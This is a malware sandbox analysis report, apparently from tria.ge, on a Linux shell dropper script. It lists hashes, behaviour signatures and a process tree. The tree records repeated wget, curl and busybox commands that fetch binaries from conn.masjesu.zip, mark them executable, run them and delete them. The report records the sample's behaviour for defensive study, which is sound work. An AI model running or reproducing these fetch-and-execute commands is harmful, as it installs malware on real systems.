Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
83s -
max time network
85s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
15/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
-
Size
10KB
-
MD5
ec466edc6c1e9e990a5ec3a4f5dc57ec
-
SHA1
163a1c64d09a52b82963878c6f77cc74cfdabd10
-
SHA256
50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a
-
SHA512
c4d304bb42e3c786e9d2eaf7eeb196d6756ce4aa6266bbc6af0ab152926100a5b86a3ca1d8e38cd7c77455be88fb5d2ab952ffd289c0a2a89c8b3c17c90fca88
-
SSDEEP
96:YLn4L5RnO+Fi69dHdbde7zJUNNTA55RAYL8AyLGCGaG0LXiddhkaS7LokkLEIbxM:LWc2GCNV0LXQoMvXNV0LXWnCx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 870 chmod 809 chmod 834 chmod 884 chmod 926 chmod 975 chmod 736 chmod 863 chmod 802 chmod 1003 chmod 989 chmod 891 chmod 919 chmod 940 chmod 968 chmod 898 chmod 905 chmod 933 chmod 982 chmod 954 chmod 961 chmod 856 chmod 877 chmod 912 chmod 947 chmod 996 chmod 751 chmod 782 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq 737 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls 752 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB 784 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh 803 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 810 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi 836 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA 857 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA 864 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 871 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 878 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ 885 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi 892 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 899 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi 906 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA 913 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA 920 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 927 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 934 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ 941 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi 948 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 955 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi 962 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq 969 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls 976 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB 983 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh 990 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 997 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi 1004 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 981 busybox 831 busybox 887 wget 918 busybox 894 wget 943 wget 964 wget 965 curl 979 curl 852 busybox 873 wget 922 wget 972 curl 740 curl 929 wget 932 busybox 805 wget 825 curl 967 busybox 901 wget 971 wget 978 wget 735 busybox 777 busybox 881 curl 936 wget 960 busybox 986 curl 708 wget 841 wget 846 curl 806 curl 808 busybox 1002 busybox 883 busybox 890 busybox 930 curl 951 curl 985 wget 756 wget 869 busybox 880 wget 1000 curl 876 busybox 902 curl 946 busybox 764 curl 790 wget 862 busybox 939 busybox 953 busybox 958 curl 974 busybox 988 busybox 888 curl 904 busybox 909 curl 999 wget 739 wget 866 wget 908 wget 944 curl 995 busybox 799 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls curl File opened for modification /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi curl File opened for modification /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 curl File opened for modification /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 curl File opened for modification /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 curl File opened for modification /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ curl File opened for modification /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB curl File opened for modification /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq curl File opened for modification /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls curl File opened for modification /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 curl File opened for modification /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA curl File opened for modification /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 curl File opened for modification /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi curl File opened for modification /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA curl File opened for modification /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 curl File opened for modification /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi curl File opened for modification /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh curl File opened for modification /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 curl File opened for modification /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB curl File opened for modification /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi curl File opened for modification /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi curl File opened for modification /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 curl File opened for modification /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA curl File opened for modification /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA curl File opened for modification /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi curl File opened for modification /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh curl File opened for modification /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ curl File opened for modification /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq curl
Processes
-
/tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh/tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- System Network Configuration Discovery
PID:708
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq2⤵PID:738
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- System Network Configuration Discovery
PID:739
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵PID:745
-
-
/bin/chmodchmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls2⤵PID:755
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- System Network Configuration Discovery
PID:756
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB2⤵PID:788
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- System Network Configuration Discovery
PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵PID:801
-
-
/bin/chmodchmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- System Network Configuration Discovery
PID:805
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA52⤵PID:813
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵PID:814
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- System Network Configuration Discovery
PID:831
-
-
/bin/chmodchmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- System Network Configuration Discovery
PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵PID:897
-
-
/bin/chmodchmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa762⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵PID:911
-
-
/bin/chmodchmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵PID:925
-
-
/bin/chmodchmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y12⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB72⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ2⤵
- Reads runtime system information
